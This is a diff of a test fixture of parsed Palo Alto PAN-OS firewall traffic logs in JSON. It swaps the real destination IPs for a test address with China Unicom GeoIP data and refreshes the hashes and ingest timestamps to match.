@@ -10441,24 +10477,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -10477,7 +10515,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25881,1,50185,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25881,1,50185,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -10511,7 +10549,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:3UaggcKnXvkcjpVHqbTU3mCMT5E=", + "community_id": "1:TBV7ZwcmT9bpnR8tE7B33GBmh/Y=", "transport": "udp", "application": "dns", "type": "ipv4", 
@@ -10549,14 +10587,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284274560Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25881,1,50185,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382012700Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25881,1,50185,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -10579,27 +10617,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -10618,7 +10655,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -10652,7 +10689,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:M8DHGZjrHyuCRpC9MNNfDUke5g4=", + "community_id": "1:MRL6gXI2+bPHjOwl6jUcT9qzDE4=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -10690,14 +10727,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284279190Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382018100Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -10821,7 +10858,7 @@ }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284288133Z", + "ingested": "2021-12-09T13:43:22.382023400Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24961,1,52531,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -10845,27 +10882,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "region_iso_code": "IT-MI", - "city_name": "Assago", - "country_iso_code": "IT", - "country_name": "Italy", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Italy", - "region_name": "Milan", + "region_name": "Jilin", "location": { - "lon": 9.1225, - "lat": 45.4087 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 8660, + "number": 4837, "organization": { - "name": "Italiaonline S.p.A." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 9064, - "ip": "212.48.10.58", + "ip": "175.16.199.1", "packets": 9 }, "rule": { 
@@ -10884,7 +10920,7 @@ }, "packets": 12 }, - "message": "192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24226,1,59194,80,0,0,0x200000,tcp,allow,10097,1033,9064,21,2012/04/10 04:39:17,3,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,9", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24226,1,59194,80,0,0,0x200000,tcp,allow,10097,1033,9064,21,2012/04/10 04:39:17,3,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,9", "panw": { "panos": { "ruleset": "rule1", @@ -10918,7 +10954,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:ZM81iQMHQAIwuZHdw5tm5lXF25A=", + "community_id": "1:6faxflTwMjHGTNJk1M9nqITkJoQ=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -10956,14 +10992,14 @@ ], "ip": [ "192.168.0.2", - "212.48.10.58", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 3000000000, - "ingested": "2021-09-08T12:38:09.284294011Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24226,1,59194,80,0,0,0x200000,tcp,allow,10097,1033,9064,21,2012/04/10 04:39:17,3,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,9", + "ingested": "2021-12-09T13:43:22.382028700Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24226,1,59194,80,0,0,0x200000,tcp,allow,10097,1033,9064,21,2012/04/10 04:39:17,3,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,9", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -10986,27 +11022,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "region_iso_code": "IT-MI", - "city_name": "Assago", - "country_iso_code": "IT", - "country_name": "Italy", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Italy", - "region_name": "Milan", + "region_name": "Jilin", "location": { - "lon": 9.1225, - "lat": 45.4087 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 8660, + "number": 4837, "organization": { - "name": "Italiaonline S.p.A." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 9124, - "ip": "212.48.10.58", + "ip": "175.16.199.1", "packets": 10 }, "rule": { 
@@ -11025,7 +11060,7 @@ }, "packets": 12 }, - "message": "192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25129,1,59192,80,0,0,0x200000,tcp,allow,10105,981,9124,22,2012/04/10 04:39:13,7,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25129,1,59192,80,0,0,0x200000,tcp,allow,10105,981,9124,22,2012/04/10 04:39:13,7,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10", "panw": { "panos": { "ruleset": "rule1", @@ -11059,7 +11094,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:yYl3JBOjYyGDcmf0pDc+hxky9gU=", + "community_id": "1:w1dj5cwtVOsCY3apswvasEyMkrg=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -11097,14 +11132,14 @@ ], "ip": [ "192.168.0.2", - "212.48.10.58", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 7000000000, - "ingested": "2021-09-08T12:38:09.284298523Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25129,1,59192,80,0,0,0x200000,tcp,allow,10105,981,9124,22,2012/04/10 04:39:13,7,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10", + "ingested": "2021-12-09T13:43:22.382033900Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25129,1,59192,80,0,0,0x200000,tcp,allow,10105,981,9124,22,2012/04/10 04:39:13,7,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -11228,7 +11263,7 @@ }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284303215Z", + "ingested": "2021-12-09T13:43:22.382039300Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25194,1,56463,53,0,0,0x200000,udp,allow,214,77,137,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", 
@@ -11353,7 +11388,7 @@ }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284307807Z", + "ingested": "2021-12-09T13:43:22.382044500Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26257,1,55849,53,0,0,0x200000,udp,allow,170,77,93,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -11377,27 +11412,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -11416,7 +11450,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -11450,7 +11484,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Vfi4CxQayypb3DoxclNfeNjXdjo=", + "community_id": "1:SdTb469tRCABgoEEDDEw1DSQQHs=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -11488,14 +11522,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284317081Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382075200Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -11518,24 +11552,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -11554,7 +11590,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26150,1,57846,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26150,1,57846,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -11588,7 +11624,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:cWkoifFGPLq+ZcxaNzzYym9H7jI=", + "community_id": "1:9iUxTHQ65OpuYpwC5gyIyZ6bZIY=", "transport": "udp", "application": "dns", "type": "ipv4", 
@@ -11626,14 +11662,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284322854Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26150,1,57846,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382078800Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26150,1,57846,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -11656,24 +11692,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -11692,7 +11730,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25676,1,51008,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25676,1,51008,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -11726,7 +11764,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:SicjKSp4oQCovx4rjFSg+IThGYA=", + "community_id": "1:SxhdeG/p1/9TuivYgKezIy0BiE0=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -11764,14 +11802,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284327399Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25676,1,51008,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382082100Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25676,1,51008,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -11794,27 +11832,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -11833,7 +11870,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -11867,7 +11904,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:/tG+YfZ8qFKrUDfQ7EThCBXci9Y=", + "community_id": "1:euxf4A6kWeWGJu6MuGDs2l85ugI=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -11905,14 +11942,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284332166Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382086400Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -11935,24 +11972,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -11971,7 +12010,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26411,1,55252,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26411,1,55252,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -12005,7 +12044,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:cp0HVI5MHMB+G4/hIuKGoX1WWac=", + "community_id": "1:mWAR74rtLQtQ3iC33h0r+wdk0V4=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -12043,14 +12082,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284336997Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26411,1,55252,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382091900Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26411,1,55252,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "event", 
